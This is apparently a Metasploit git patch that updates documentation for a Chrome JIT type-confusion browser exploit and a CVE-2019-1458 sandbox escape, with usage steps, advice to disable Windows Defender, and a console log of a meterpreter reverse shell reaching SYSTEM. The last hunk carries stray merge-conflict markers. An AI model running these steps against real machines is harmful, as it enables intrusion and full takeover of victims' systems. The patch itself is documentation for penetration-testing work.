From 87104a7236b09dfee1dfafa981f0c88d6cd6d371 Mon Sep 17 00:00:00 2001 From: Tim W Date: Mon, 12 Oct 2020 18:53:55 +0800 Subject: [PATCH] Update docs and make them msftidy_docs.rb compliant --- .../multi/browser/chrome_object_create.md | 97 ++++++++++++++++--- .../local/cve_2019_1458_wizardopium.md | 2 +- .../multi/browser/chrome_object_create.rb | 2 +- 3 files changed, 85 insertions(+), 16 deletions(-) diff --git a/documentation/modules/exploit/multi/browser/chrome_object_create.md b/documentation/modules/exploit/multi/browser/chrome_object_create.md index 721d0769fd0b..e9848fe2ae7f 100755 --- a/documentation/modules/exploit/multi/browser/chrome_object_create.md +++ b/documentation/modules/exploit/multi/browser/chrome_object_create.md @@ -1,35 +1,56 @@ -This modules exploits a type confusion in Google Chromes JIT compiler. The Object.create operation can be used to cause a type confusion between a PropertyArray and a NameDictionary. -The type confusion can be used to construct a arbitrary read/write memory primitive, which is used to write shellcode into rwx region of a WebAssembly object. +## Vulnerable Application +This modules exploits a type confusion in Google Chromes JIT compiler. +The Object.create operation can be used to cause a type confusion between a PropertyArray and a NameDictionary. +The type confusion can be used to construct a arbitrary read/write memory primitive, which is +used to write shellcode into rwx region of a WebAssembly object. -**This module does not contain an exploit to escape the sandbox, so you must launch Google Chrome with the --no-sandbox option** +This module can target the renderer process (target 0), but Google Chrome must be launched +with the --no-sandbox flag for the payload to execute successfully. -## Vulnerable Application +Alternatively, this module can use CVE-2019-1458 to escape the renderer sandbox (target 1). This +will only work on vulnerable versions of Windows (e.g Windows 7) and the exploit can only be triggered once. -The module is compatible with any 64bit Google Chrome (version 67, 68 or 69), on any platform (macOS, Linux or Windows), however the code that writes the shellcode into the rwx region (wasm_rwx_addr) may need to be modified. +Additionally the exploit can cause the target machine to restart when the session is terminated. +A BSOD is also likely to occur when the system is shut down or rebooted. + +The module is compatible with any 64bit Google Chrome (version 67, 68 or 69), on any platform (macOS, Linux or Windows), +however the code that writes the shellcode into the rwx region (wasm_rwx_addr) may need to be modified. **Vulnerable Application Installation Steps** You can download a vulnerable Chrome version from this location: [https://www.filepuma.com/download/google_chrome_64bit_69.0.3497.100-20128/](https://www.filepuma.com/download/google_chrome_64bit_69.0.3497.100-20128/) -You should ensure that application does not update itself to the latest version (by disabling automatic updates or simply not connecting to the internet). +You should ensure that application does not update itself to the latest version +(by disabling automatic updates or simply not connecting to the internet) You may also need to disable Windows Defender. ## Verification Steps -1. Do: ```use exploit/multi/browser/chrome_object_create``` -2. Do: ```set payload windows/x64/meterpreter/reverse_tcp``` -2. Do: ```set LHOST [IP]``` -3. Do: ```set SRVHOST [IP]``` -3. Do: ```set URIPATH / [PATH]``` -4. Do: ```run``` +1. Do: `use exploit/multi/browser/chrome_object_create` +1. Do: `set target [0|1]` +2. Do: `set payload windows/x64/meterpreter/reverse_tcp` +2. Do: `set LHOST [IP]` +3. Do: `set SRVHOST [IP]` +3. Do: `set URIPATH / [PATH]` +4. Do: `run` + +## Options + +### TARGET +``` +Id Name +-- ---- +0 No sandbox escape (--no-sandbox) +1 Windows 7 (x64) sandbox escape via CVE-2019-1458 +``` ## Scenarios -### Windows 10 and Google Chrome 69.0.3497.100 with --no-sandbox +### Windows 10 and Google Chrome 69.0.3497.100 with --no-sandbox (target 0) Start Google Chrome without a sandbox: -```"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox``` +`"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox` ``` msf5 > use exploit/multi/browser/chrome_object_create @@ -59,3 +80,51 @@ meterpreter > pwd C:\Program Files (x86)\Google\Chrome\Application\69.0.3497.100 meterpreter > ``` + + +### Windows 7 SP1 and Google Chrome 69.0.3497.100 with CVE-2019-1458 (target 1) + +``` + + +msf6 > use exploit/multi/browser/chrome_object_create +[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp +msf6 exploit(multi/browser/chrome_object_create) > set target 1 +target => 1 +msf6 exploit(multi/browser/chrome_object_create) > set payload windows/x64/meterpreter/reverse_tcp +payload => windows/x64/meterpreter/reverse_tcp +msf6 exploit(multi/browser/chrome_object_create) > set URIPATH / +URIPATH => / +msf6 exploit(multi/browser/chrome_object_create) > set LHOST 192.168.56.1 +LHOST => 192.168.56.1 +msf6 exploit(multi/browser/chrome_object_create) > set SRVHOST 192.168.56.1 +SRVHOST => 192.168.56.1 +msf6 exploit(multi/browser/chrome_object_create) > run +[*] Exploit running as background job 0. +[*] Exploit completed, but no session was created. +msf6 exploit(multi/browser/chrome_object_create) > +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Using URL: http://192.168.56.1:8080/ +[*] Server started. +[*] 192.168.56.3 chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 +[*] 192.168.56.3 chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 +[*] 192.168.56.3 chrome_object_create - Sending /payload to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 +[+] 192.168.56.3 chrome_object_create - Sent stage2 exploit (20000 bytes) +[*] Sending stage (200262 bytes) to 192.168.56.3 +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49159) at 2020-10-12 18:51:15 +0800 +[*] Session ID 1 (192.168.56.1:4444 -> 192.168.56.3:49159) processing InitialAutoRunScript 'post/windows/manage/priv_migrate' +[*] Current session process is chrome.exe (2528) as: NT AUTHORITY\SYSTEM +[*] Session is already Admin and System. +[*] Will attempt to migrate to specified System level process. +[*] Trying services.exe (480) +[+] Successfully migrated to services.exe (480) as: NT AUTHORITY\SYSTEM + +msf6 exploit(multi/browser/chrome_object_create) > sessions + +Active sessions +=============== + + Id Name Type Information Connection + -- ---- ---- ----------- ---------- + 1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ USER-PC 192.168.56.1:4444 -> 192.168.56.3:49159 (192.168.56.3) +``` diff --git a/documentation/modules/exploit/windows/local/cve_2019_1458_wizardopium.md b/documentation/modules/exploit/windows/local/cve_2019_1458_wizardopium.md index cf3908288f70..8c98cee6dcb3 100644 --- a/documentation/modules/exploit/windows/local/cve_2019_1458_wizardopium.md +++ b/documentation/modules/exploit/windows/local/cve_2019_1458_wizardopium.md @@ -16,7 +16,7 @@ of Windows. 1. Get a non-SYSTEM meterpreter session on Windows 7 SP1 x64 1. `use exploit/windows/local/cve_2019_1458_wizardopium` 1. `set session ` -1. `set payload windows/meterpreter/reverse_tcp` +1. `set payload windows/x64/meterpreter/reverse_tcp` 1. `set LHOST ` 1. `set LPORT 5555` 1. `exploit` diff --git a/modules/exploits/multi/browser/chrome_object_create.rb b/modules/exploits/multi/browser/chrome_object_create.rb index 70737c9cb66d..9d291f6532de 100644 --- a/modules/exploits/multi/browser/chrome_object_create.rb +++ b/modules/exploits/multi/browser/chrome_object_create.rb @@ -57,7 +57,7 @@ def initialize(info = {}) 'Targets' => [ ======= 'Arch' => [ ARCH_X64 ], - 'Platform' => ['windows', 'osx'], + 'Platform' => ['windows', 'osx', 'linux'], 'DefaultTarget' => 0, 'Targets' => [ >>>>>>> b5da8834bc... rubocop